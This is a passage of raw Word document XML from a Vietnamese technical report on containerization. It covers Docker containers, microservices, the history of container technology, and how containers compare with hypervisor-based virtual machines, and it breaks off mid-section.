        <w:t xml:space="preserve">Chính những đặc tính ưu việt ấy — lớp vỏ đóng gói độc lập, khả năng tái sử dụng và tính chuẩn hóa — đã trở thành cảm hứng cho giải pháp đóng gói ứng dụng trong lĩnh vực Công nghệ thông tin. Trong kiến trúc phần mềm, khái niệm "container" được </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4545">
        <w:t>khái quát lên phù hợp cho lĩnh vực xây dựng kiến trúc cốt lõi</w:t>
      </w:r>
      <w:r>
        <w:t>. Theo Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4545">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C34454" w:rsidRPr="00EE4545">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00C34454" w:rsidRPr="00EE4545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Container là một đơn vị phần mềm tiêu chuẩn giúp đóng gói mã nguồn cùng tất cả các thành phần phụ thuộc, đảm bảo ứng dụng vận hành nhanh chóng và ổn định khi chuyển đổi giữa các môi trường điện toán khác nhau. Docker container image là một gói phần mềm gọn nhẹ, độc lập và có thể thực thi được; nó chứa mọi thứ cần thiết để </w:t>
      </w:r>
      <w:r w:rsidR="00C34454" w:rsidRPr="00EE4545">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chạy ứng dụng, bao gồm mã nguồn, môi trường thực thi (runtime), các công cụ hệ thống, thư viện hệ thống và các thiết lập cấu hình.</w:t>
      </w:r>
      <w:r w:rsidR="00C34454" w:rsidRPr="00EE4545">
        <w:t>”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1752953159"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:instrText xml:space="preserve"> CITATION Mik24 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00175415">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00EE4545">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Như vậy, có thể thấy Container về mặt bản chất là một tiêu chuẩn đóng gói và thực thi phần mềm, giúp tối ưu hóa quá trình triển khai. Tuy nhiên, không ít góc nhìn chưa chính xác khi coi Container là một kiến trúc hệ thống hoàn chỉnh; thực chất, Container đóng vai trò là hạ tầng đóng gói lý tưởng phục vụ cho một xu hướng kiến trúc tổng thể hơn: Kiến trúc Vi dịch vụ (Microservices).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76399A88" w14:textId="5D4361E2" w:rsidR="007A2D34" w:rsidRPr="007A2D34" w:rsidRDefault="007A2D34" w:rsidP="007A2D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc235976345"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiến trúc Monolithic và Microservice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4AD9D130" w14:textId="77777777" w:rsidR="00503FC1" w:rsidRDefault="007A2D34" w:rsidP="00503FC1">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D34">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BADABEA" wp14:editId="6ECC4CCC">
            <wp:extent cx="4817999" cy="2381046"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
            <wp:docPr id="234828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5767" cy="2384885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6C35D" w14:textId="3CB80967" w:rsidR="007A2D34" w:rsidRPr="00503FC1" w:rsidRDefault="00503FC1" w:rsidP="00503FC1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc236001515"/>
      <w:r w:rsidRPr="00503FC1">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w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00503FC1">
        <w:t>. So sánh mô hình kiến trúc Monolithic và Microservice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="794763C5" w14:textId="42CB8875" w:rsidR="00EE4545" w:rsidRPr="00503FC1" w:rsidRDefault="00EE4545" w:rsidP="00EE4545">
      <w:r>
        <w:t>Vậy Microservices thực sự là gì? Trái ngược với kiến trúc khối thống nhất (Monolith) truyền thống</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE4545">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>nơi toàn bộ hệ thống gộp chung vào một mã nguồn, Microservices là phong cách kiến trúc chia nhỏ ứng dụng thành nhiều dịch vụ độc lập, mỗi dịch vụ đảm nhận một chức năng kinh doanh riêng biệt. Khi đó, từng dịch vụ nhỏ này sẽ được "đóng gói" gọn nhẹ bên trong một Container, giúp hệ thống vừa dễ dàng mở rộng, vừa hoạt động độc lập và linh hoạt trên mọi môi trường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F3B7A" w14:textId="5CC85716" w:rsidR="009F2546" w:rsidRPr="002B4188" w:rsidRDefault="009F2546" w:rsidP="009F2546">
      <w:r w:rsidRPr="009F2546">
        <w:t xml:space="preserve">Công nghệ container hóa (containerization) tối ưu hóa hiệu suất sử dụng tài nguyên hệ thống, cho phép triển khai đồng thời đa ứng dụng trên một máy chủ vật lý duy nhất. Giải pháp này đảm bảo tính độc lập tuyệt đối của môi trường thực thi, loại bỏ sự phụ thuộc và các giới hạn phân mảnh phiên bản từ hệ điều hành (OS) của máy </w:t>
      </w:r>
      <w:r w:rsidRPr="009F2546">
        <w:lastRenderedPageBreak/>
        <w:t>chủ.</w:t>
      </w:r>
      <w:r w:rsidR="002B4188" w:rsidRPr="002B4188">
        <w:t xml:space="preserve"> Một công nghệ hữu ích xuất phát từ những nhu cầu thực tế dưới đây là một số cột mốc trong quá trình định hình và phát triển của “Containerization”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21309503" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="002B4188" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79695132" wp14:editId="7D026E18">
            <wp:extent cx="4885898" cy="2246179"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1290304338" name="Picture 1" descr="Understanding Container Technology: The Future of Application Deployment |  by JI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Understanding Container Technology: The Future of Application Deployment |  by JIN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1519" cy="2248763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF144F6" w14:textId="6201E578" w:rsidR="002B4188" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc236001516"/>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2</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>. Sơ lược lịch sử hình thành công nghệ Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="30E8E5D1" w14:textId="77777777" w:rsidR="002B4188" w:rsidRPr="005062A7" w:rsidRDefault="002B4188" w:rsidP="002B4188">
      <w:r w:rsidRPr="005062A7">
        <w:t>Lịch sử hình thành và phát triển của công nghệ container là một hành trình dài từ những ý tưởng sơ khai về cô lập quy trình cho đến một hệ sinh thái quản lý đám mây toàn diện. Khởi đầu từ năm 1979 với sự ra đời của Unix v7, tính năng chroot đã đặt viên gạch đầu tiên bằng cách cho phép phân tách không gian tệp cho từng quy trình cụ thể. Bước sang giai đoạn 2000–2005, công nghệ ảo hóa cấp độ hệ điều hành được nâng lên một tầm cao mới nhờ FreeBSD Jails với khả năng cô lập cả người dùng lẫn mạng lưới, tiếp nối bởi sự xuất hiện của Solaris Containers và OpenVZ trên nền tảng Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C5635B" w14:textId="0473A53D" w:rsidR="002B4188" w:rsidRPr="005062A7" w:rsidRDefault="002B4188" w:rsidP="002B4188">
      <w:r w:rsidRPr="005062A7">
        <w:t>Cột mốc quan trọng tiếp theo diễn ra vào những năm 2006–2008 khi Google đóng góp dự án Process Containers (sau này là cgroups), tạo tiền đề vững chắc cho sự ra đời của LXC (Linux Containers). LXC chính là trình quản lý container hoàn chỉnh đầu tiên tích hợp sâu vào nhân Linux. Tuy nhiên, công nghệ này chỉ thực sự bùng nổ và tiếp cận được số đông đại chúng vào năm 2013 nhờ sự xuất hiện của Docker, giúp chuẩn hóa và đơn giản hóa toàn bộ quy trình đóng gói ứng dụng. Để giải quyết bài toán quản lý quy mô lớn khi container trở nên phổ biến, Google tiếp tục công bố dự án Kubernetes vào năm 2014 để điều phối và tự động hóa hệ thống này.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="39414109"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:instrText xml:space="preserve"> CITATION The25 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00C254C6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00C254C6" w:rsidRPr="00175415">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00C254C6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="225B29E3" w14:textId="01824579" w:rsidR="002B4188" w:rsidRPr="005062A7" w:rsidRDefault="002B4188" w:rsidP="008C6FBD">
      <w:r w:rsidRPr="005062A7">
        <w:lastRenderedPageBreak/>
        <w:t>Cho đến nay, Kubernetes đã trở thành chuẩn mực cốt lõi của toàn ngành công nghiệp dưới sự quản lý của tổ chức CNCF. Trong tương lai, công nghệ container được dự báo sẽ tiếp tục dịch chuyển mạnh mẽ hướng tới các kiến trúc siêu trừu tượng, mô hình mã nguồn không máy chủ (Serverless), chú trọng bảo mật DevSecOps và mở rộng phạm vi hoạt động đến các vùng biên thông minh (Intelligent Edge) cùng môi trường đa đám mây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376AE757" w14:textId="6E2BBF59" w:rsidR="009F2546" w:rsidRPr="009E0111" w:rsidRDefault="009F2546" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc235976347"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Phân biệt Container và Máy ảo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4ED5D099" w14:textId="1EFA05DC" w:rsidR="008C6FBD" w:rsidRPr="009823E1" w:rsidRDefault="008C6FBD" w:rsidP="008C6FBD">
      <w:r w:rsidRPr="009823E1">
        <w:t>Để hiểu rõ sự dịch chuyển công nghệ từ ảo hóa truyền thống sang xu hướng container hóa, việc phân tích và so sánh kiến trúc cốt lõi giữa hai giải pháp này là điều vô cùng thiết yếu. Về cơ bản, sự khác biệt lớn nhất nằm ở tầng trừu tượng (abstraction layer) mà mỗi công nghệ lựa chọn để cô lập tài nguyên: một bên ảo hóa từ cấp độ phần cứng (Hardware-level Virtualization), trong khi bên còn lại ảo hóa ở cấp độ hệ điều hành (OS-level Virtualization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66955565" w14:textId="3E50B8DD" w:rsidR="008C6FBD" w:rsidRPr="009823E1" w:rsidRDefault="008C6FBD" w:rsidP="0084767F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ảo hóa cấp phần cứng</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> là công nghệ tạo ra các máy ảo (Virtual Machines - VMs) hoạt động hoàn toàn độc lập với nhau và với máy chủ vật lý (Host OS/Hardware). Trọng tâm của kiến trúc này là Hypervisor (Trình giám sát máy ảo) – một tầng phần mềm chịu trách nhiệm quản lý, phân phối tài nguyên phần cứng vật lý (CPU, RAM, Ổ cứng) và khởi tạo các phần cứng ảo cho từng máy ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC67A0" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="008C6FBD" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3699701E" wp14:editId="7948D44D">
            <wp:extent cx="4537135" cy="1890215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210064741" name="Picture 2" descr="Hypervisor-based virtualization archite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ypervisor-based virtualization architecture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5958" cy="1898057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CCAF46" w14:textId="2FEB296A" w:rsidR="008C6FBD" w:rsidRPr="00C05E16" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc236001517"/>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3</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Kiến trúc tổng thể của ảo hóa VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="13091973" w14:textId="77777777" w:rsidR="00C9186E" w:rsidRPr="00C05E16" w:rsidRDefault="00C9186E" w:rsidP="00C9186E">
      <w:r w:rsidRPr="00C05E16">
        <w:t>Hypervisor được chia làm hai loại chính với cấu trúc phân tầng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2211AA" w14:textId="1CB5D750" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00695BEE" w:rsidP="00C9186E">
      <w:r w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00C9186E" w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hypervisor Type 1 (Bare-metal):</w:t>
      </w:r>
      <w:r w:rsidR="00C9186E" w:rsidRPr="005062A7">
        <w:t xml:space="preserve"> Cài đặt trực tiếp lên trên phần cứng vật lý của máy chủ mà không cần hệ điều hành nền. Các máy ảo (Guest OS) sẽ chạy trực tiếp phía trên tầng Hypervisor này (Ví dụ: VMware ESXi, Microsoft Hyper-V, KVM). Kiến trúc này mang lại hiệu năng cao và tính an toàn tuyệt đối nên thường được dùng trong các trung tâm dữ liệu lớn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C8C23" w14:textId="54E78EB2" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00695BEE" w:rsidP="00C9186E">
      <w:r w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00C9186E" w:rsidRPr="005062A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hypervisor Type 2 (Hosted):</w:t>
      </w:r>
      <w:r w:rsidR="00C9186E" w:rsidRPr="005062A7">
        <w:t xml:space="preserve"> Chạy như một ứng dụng trên nền tảng của một hệ điều hành chủ (Host OS). Hệ điều hành chủ điều khiển phần cứng, Hypervisor gọi tài nguyên từ Host OS để phân phối cho Guest OS (Ví dụ: VirtualBox, VMware Workstation). Kiến trúc này linh hoạt, dễ cài đặt trên máy tính cá nhân nhưng hiệu năng bị giảm sút do phải qua nhiều tầng trung gian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD75D5B" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="00C9186E" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CEE3134" wp14:editId="28C11D79">
            <wp:extent cx="3016155" cy="2580717"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1710870303" name="Picture 3" descr="Difference Between Type 1 and Type 2 Hypervisor?⠀ | DiskInter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ifference Between Type 1 and Type 2 Hypervisor?⠀ | DiskInterna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4565" cy="2587912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E35BB" w14:textId="7B3E4698" w:rsidR="00C9186E" w:rsidRPr="00C05E16" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc236001518"/>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4</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Mô hình kiến trúc Hypervis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or Type 1 và 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="64ECE459" w14:textId="3859FABD" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00C9186E" w:rsidP="00C9186E">
      <w:r w:rsidRPr="00C05E16">
        <w:t xml:space="preserve">Đặc điểm kiến trúc: Mỗi máy ảo được khởi tạo bắt buộc phải sở hữu một Hệ điều hành khách (Guest OS) riêng biệt, đi kèm đầy đủ các driver ảo, nhân (kernel) và các thư viện hệ thống độc lập. </w:t>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>Chính cấu trúc "nặng nề" này khiến VM tiêu tốn một lượng tài nguyên cố định đáng kể ngay cả khi ứng dụng bên trong chưa vận hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FF46E" w14:textId="77777777" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00C9186E" w:rsidP="00695BEE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9186E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kiến trúc Ảo hóa cấp hệ điều hành (Containerization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0E1EF" w14:textId="62CC2075" w:rsidR="00C9186E" w:rsidRDefault="00C9186E" w:rsidP="00695BEE">
      <w:r>
        <w:t xml:space="preserve">Trái ngược với cách tiếp cận của Máy ảo, ảo hóa cấp hệ điều hành hay Containerization không cố gắng giả lập phần cứng ảo. Thay vào đó, công nghệ này </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">tận dụng trực tiếp nhân (Kernel) của Hệ điều hành chủ (Host OS) và sử dụng các tính năng cô lập mạnh mẽ của Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA296C">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(như </w:t>
      </w:r>
      <w:r w:rsidR="00B56A24" w:rsidRPr="00B56A24">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA296C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>amespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA296C">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để cô lập không gian làm việc và </w:t>
      </w:r>
      <w:r w:rsidR="00B56A24" w:rsidRPr="00B56A24">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA296C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA296C">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để giới hạn tài nguyên) </w:t>
      </w:r>
      <w:r>
        <w:t>để tạo ra các không gian chạy ứng dụng biệt lập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC39C71" w14:textId="77777777" w:rsidR="00C05E16" w:rsidRDefault="00C9186E" w:rsidP="00C05E16">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63718F0D" wp14:editId="09F7E5B8">
            <wp:extent cx="3201627" cy="2135875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1887470687" name="Picture 4" descr="What is Containerization Software? Definition &amp;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What is Containerization Software? Definition &amp; Benefi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6135" cy="2138882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F34779" w14:textId="1CE2A0F0" w:rsidR="00C9186E" w:rsidRPr="005062A7" w:rsidRDefault="00C05E16" w:rsidP="00C05E16">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc236001519"/>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5</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C05E16">
        <w:t>. Mô hình phân lớp kiến trúc Contain</w:t>
      </w:r>
      <w:r w:rsidRPr="005062A7">
        <w:t>er</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="53787855" w14:textId="77777777" w:rsidR="00C9186E" w:rsidRDefault="00C9186E" w:rsidP="00695BEE">
      <w:r>
        <w:t xml:space="preserve">Đóng vai trò điều phối trung tâm trong kiến trúc này là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Container Engine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ví dụ: Docker Engine, Podman). Container Engine không phân chia phần cứng, nó chỉ thiết lập các ranh giới phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD499E" w14:textId="77777777" w:rsidR="00C9186E" w:rsidRDefault="00C9186E" w:rsidP="00695BEE">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đặc điểm kiến trúc:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Các container trên cùng một máy chủ sẽ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chia sẻ chung nhân hệ điều hành (Shared Kernel)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của máy chủ vật lý. Mỗi container chỉ đóng gói mã nguồn ứng dụng cùng các thư viện phụ thuộc (bin/libs) tối thiểu cần thiết để chạy ứng dụng đó. Do loại bỏ hoàn toàn được tầng Guest OS cồng kềnh, container trở nên siêu nhẹ, có kích thước chỉ vài chục MB đến vài trăm MB và có thể khởi động ngay lập tức trong vòng vài mili giây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8AEDF3" w14:textId="0234E496" w:rsidR="009D772B" w:rsidRPr="009E0111" w:rsidRDefault="009D772B" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc235976348"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Kiến trúc phân lớp của hệ thống Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="12D776E5" w14:textId="77777777" w:rsidR="009D772B" w:rsidRPr="009823E1" w:rsidRDefault="009D772B" w:rsidP="009D772B">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t>Một hệ sinh thái container tiêu chuẩn được cấu thành từ bốn thành phần logic nền tảng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1F020" w14:textId="1DDBB8B8" w:rsidR="00695BEE" w:rsidRPr="00F51078" w:rsidRDefault="00695BEE" w:rsidP="009D772B">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hệ thống tệp phân lớp (Filesystem)</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D772B" w:rsidRPr="009823E1">
